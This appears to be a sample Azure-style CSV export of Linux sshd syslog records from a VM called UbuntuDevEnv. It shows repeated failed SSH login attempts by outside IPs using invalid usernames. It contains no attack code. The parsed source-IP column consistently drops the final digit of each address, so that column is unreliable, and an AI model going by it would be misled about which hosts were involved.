+6443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:07,UbuntuDevEnv,2019-06-26 16:56:07,auth,UbuntuDevEnv,info,Invalid user films from 74.94.246.82 port 51372,42598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,films,74.94.246.8,51372,,
+6444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:07,UbuntuDevEnv,2019-06-26 16:56:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:07,UbuntuDevEnv,2019-06-26 16:56:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,42598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:09,UbuntuDevEnv,2019-06-26 16:56:08,auth,UbuntuDevEnv,info,Failed password for invalid user films from 74.94.246.82 port 51372 ssh2,42598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,films,74.94.246.8,51372,,
+6447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:09,UbuntuDevEnv,2019-06-26 16:56:08,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 51372:11: Bye Bye [preauth],42598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,51372,,
+6448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:09,UbuntuDevEnv,2019-06-26 16:56:08,auth,UbuntuDevEnv,info,Disconnected from invalid user films 74.94.246.82 port 51372 [preauth],42598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,films,74.94.246.8,51372,,
+6449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:24,UbuntuDevEnv,2019-06-26 16:56:23,auth,UbuntuDevEnv,info,Invalid user uftp from 35.154.19.93 port 38248,42653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,35.154.19.9,38248,,
+6450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:24,UbuntuDevEnv,2019-06-26 16:56:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:24,UbuntuDevEnv,2019-06-26 16:56:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:26,UbuntuDevEnv,2019-06-26 16:56:25,auth,UbuntuDevEnv,info,Failed password for invalid user uftp from 35.154.19.93 port 38248 ssh2,42653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,35.154.19.9,38248,,
+6453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:26,UbuntuDevEnv,2019-06-26 16:56:25,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 38248:11: Normal Shutdown, Thank you for playing [preauth]",42653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,38248,,
+6454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:26,UbuntuDevEnv,2019-06-26 16:56:25,auth,UbuntuDevEnv,info,Disconnected from invalid user uftp 35.154.19.93 port 38248 [preauth],42653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,35.154.19.9,38248,,
+6455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:28,UbuntuDevEnv,2019-06-26 16:56:28,auth,UbuntuDevEnv,info,Invalid user mouse from 81.0.212.18 port 39734,42677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mouse,81.0.212.1,39734,,
+6456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:28,UbuntuDevEnv,2019-06-26 16:56:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,42677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:28,UbuntuDevEnv,2019-06-26 16:56:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:31,UbuntuDevEnv,2019-06-26 16:56:30,auth,UbuntuDevEnv,info,Failed password for invalid user mouse from 81.0.212.18 port 39734 ssh2,42677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mouse,81.0.212.1,39734,,
+6459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:31,UbuntuDevEnv,2019-06-26 16:56:30,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 39734:11: Bye Bye [preauth],42677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,39734,,
+6460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:31,UbuntuDevEnv,2019-06-26 16:56:30,auth,UbuntuDevEnv,info,Disconnected from invalid user mouse 81.0.212.18 port 39734 [preauth],42677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mouse,81.0.212.1,39734,,
+6461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:49,UbuntuDevEnv,2019-06-26 16:56:49,auth,UbuntuDevEnv,info,Invalid user bmueni from 171.8.199.77 port 46408,42745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bmueni,171.8.199.7,46408,,
+6462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:49,UbuntuDevEnv,2019-06-26 16:56:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,42745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:49,UbuntuDevEnv,2019-06-26 16:56:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:51,UbuntuDevEnv,2019-06-26 16:56:50,auth,UbuntuDevEnv,info,Failed password for invalid user bmueni from 171.8.199.77 port 46408 ssh2,42745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bmueni,171.8.199.7,46408,,
+6465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:51,UbuntuDevEnv,2019-06-26 16:56:50,auth,UbuntuDevEnv,info,Disconnected from invalid user bmueni 171.8.199.77 port 46408 [preauth],42745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bmueni,171.8.199.7,46408,,
+6466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:51,UbuntuDevEnv,2019-06-26 16:56:50,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 46408:11: Bye Bye [preauth],42745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,46408,,
+6467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:55,UbuntuDevEnv,2019-06-26 16:56:55,auth,UbuntuDevEnv,info,Invalid user ftp from 35.154.19.93 port 41476,42774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,35.154.19.9,41476,,
+6468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:55,UbuntuDevEnv,2019-06-26 16:56:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:55,UbuntuDevEnv,2019-06-26 16:56:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:57,UbuntuDevEnv,2019-06-26 16:56:57,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 35.154.19.93 port 41476 ssh2,42774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,35.154.19.9,41476,,
+6471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:58,UbuntuDevEnv,2019-06-26 16:56:57,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp 35.154.19.93 port 41476 [preauth],42774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,35.154.19.9,41476,,
+6472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:56:58,UbuntuDevEnv,2019-06-26 16:56:57,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 41476:11: Normal Shutdown, Thank you for playing [preauth]",42774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,41476,,
+6473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:14,UbuntuDevEnv,2019-06-26 16:57:14,auth,UbuntuDevEnv,info,Invalid user socrate from 2.139.209.78 port 34776,42841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,2.139.209.7,34776,,
+6474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:14,UbuntuDevEnv,2019-06-26 16:57:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:14,UbuntuDevEnv,2019-06-26 16:57:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=2.139.209.78,42841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,2.139.209.7,,0,
+6476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:16,UbuntuDevEnv,2019-06-26 16:57:15,auth,UbuntuDevEnv,info,Failed password for invalid user socrate from 2.139.209.78 port 34776 ssh2,42841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,2.139.209.7,34776,,
+6477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:16,UbuntuDevEnv,2019-06-26 16:57:15,auth,UbuntuDevEnv,info,Disconnected from invalid user socrate 2.139.209.78 port 34776 [preauth],42841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,2.139.209.7,34776,,
+6478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:16,UbuntuDevEnv,2019-06-26 16:57:15,auth,UbuntuDevEnv,info,Received disconnect from 2.139.209.78 port 34776:11: Bye Bye [preauth],42841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,2.139.209.7,34776,,
+6479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:24,UbuntuDevEnv,2019-06-26 16:57:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:24,UbuntuDevEnv,2019-06-26 16:57:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=2.139.209.78,42876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,2.139.209.7,,0,
+6481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:24,UbuntuDevEnv,2019-06-26 16:57:23,auth,UbuntuDevEnv,info,Invalid user socrate from 2.139.209.78 port 35803,42876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,2.139.209.7,35803,,
+6482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:25,UbuntuDevEnv,2019-06-26 16:57:24,auth,UbuntuDevEnv,info,Failed password for invalid user socrate from 2.139.209.78 port 35803 ssh2,42876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,2.139.209.7,35803,,
+6483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:25,UbuntuDevEnv,2019-06-26 16:57:25,auth,UbuntuDevEnv,info,Received disconnect from 2.139.209.78 port 35803:11: Bye Bye [preauth],42876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,2.139.209.7,35803,,
+6484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:25,UbuntuDevEnv,2019-06-26 16:57:25,auth,UbuntuDevEnv,info,Disconnected from invalid user socrate 2.139.209.78 port 35803 [preauth],42876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,2.139.209.7,35803,,
+6485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:29,UbuntuDevEnv,2019-06-26 16:57:28,auth,UbuntuDevEnv,info,Invalid user ftp from 35.154.19.93 port 44750,42899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,35.154.19.9,44750,,
+6486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:29,UbuntuDevEnv,2019-06-26 16:57:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:29,UbuntuDevEnv,2019-06-26 16:57:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:29,UbuntuDevEnv,2019-06-26 16:57:29,auth,UbuntuDevEnv,info,Invalid user english from 54.37.66.73 port 53818,42903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,54.37.66.7,53818,,
+6489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:29,UbuntuDevEnv,2019-06-26 16:57:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:29,UbuntuDevEnv,2019-06-26 16:57:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,42903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+6491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:31,UbuntuDevEnv,2019-06-26 16:57:30,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 35.154.19.93 port 44750 ssh2,42899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,35.154.19.9,44750,,
+6492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:31,UbuntuDevEnv,2019-06-26 16:57:30,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp 35.154.19.93 port 44750 [preauth],42899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,35.154.19.9,44750,,
+6493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:31,UbuntuDevEnv,2019-06-26 16:57:30,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 44750:11: Normal Shutdown, Thank you for playing [preauth]",42899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,44750,,
+6494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:31,UbuntuDevEnv,2019-06-26 16:57:30,auth,UbuntuDevEnv,info,Failed password for invalid user english from 54.37.66.73 port 53818 ssh2,42903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,54.37.66.7,53818,,
+6495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:31,UbuntuDevEnv,2019-06-26 16:57:30,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 53818:11: Bye Bye [preauth],42903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,53818,,
+6496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:31,UbuntuDevEnv,2019-06-26 16:57:30,auth,UbuntuDevEnv,info,Disconnected from invalid user english 54.37.66.73 port 53818 [preauth],42903,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,54.37.66.7,53818,,
+6497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:33,UbuntuDevEnv,2019-06-26 16:57:32,auth,UbuntuDevEnv,info,Invalid user couscous from 111.230.29.17 port 42984,42914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,couscous,111.230.29.1,42984,,
+6498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:33,UbuntuDevEnv,2019-06-26 16:57:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:33,UbuntuDevEnv,2019-06-26 16:57:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,42914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+6500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:35,UbuntuDevEnv,2019-06-26 16:57:34,auth,UbuntuDevEnv,info,Failed password for invalid user couscous from 111.230.29.17 port 42984 ssh2,42914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,couscous,111.230.29.1,42984,,
+6501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:35,UbuntuDevEnv,2019-06-26 16:57:34,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 42984:11: Bye Bye [preauth],42914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,42984,,
+6502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:57:35,UbuntuDevEnv,2019-06-26 16:57:34,auth,UbuntuDevEnv,info,Disconnected from invalid user couscous 111.230.29.17 port 42984 [preauth],42914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,couscous,111.230.29.1,42984,,
